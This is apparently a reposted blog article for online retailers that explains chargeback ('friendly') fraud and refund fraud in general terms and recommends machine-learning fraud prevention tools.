
Chargeback or “Friendly” Fraud

Chargeback fraud is when a customer purchases a product or service before contacting their credit card company to void the purchase, resulting in a “chargeback.”

Also called, “friendly fraud,” these cases are interesting because it could result from a legitimate purchase not being recognized by the customer. However, despite a lack of maliciousness, it is no less detrimental to e-commerce merchants. At the end of the day, it can still have a negative impact on the business-customer relationship.

Scammers will intentionally commit chargeback fraud by abusing policies to get items for free, knowing the purchase will be refunded to their credit card. Retailers then lose out by:

  • Lost merchandise

  • Shipping costs

  • Chargeback fees

  • Banking fines

Refund Fraud

Refund fraud is when a scammer purchases a product or service using a stolen credit card and has it refunded to their credit card. Typically, fraudsters will do this by informing the merchant that the refund will need to be processed on a new credit card because the old one has been closed.

It’s a tricky situation for merchants because it can be difficult to decipher which claims are legitimate and which ones are not.

Taking the Burden off Retailers

While retailers can conduct consistent site security audits to train support teams to spot the signs of fraud, the burden shouldn’t be on the retailers’ shoulders alone. Fraud prevention solutions can help automate the scam-detection process.  Machine-learning-based fraud prevention tools can significantly reduce the risk of fraud while ensuring a smooth customer shopping experience.

It’s important to stay educated on the most common fraud tactics to stay aware, but a modern fraud prevention solution can help fill in the gaps and keep retailers’ teams focused on providing top-of-the-line products and services for consumers.

The post Breaking Down e-commerce Fraud – The Five Pillars of Fraud appeared first on Cybersecurity Insiders.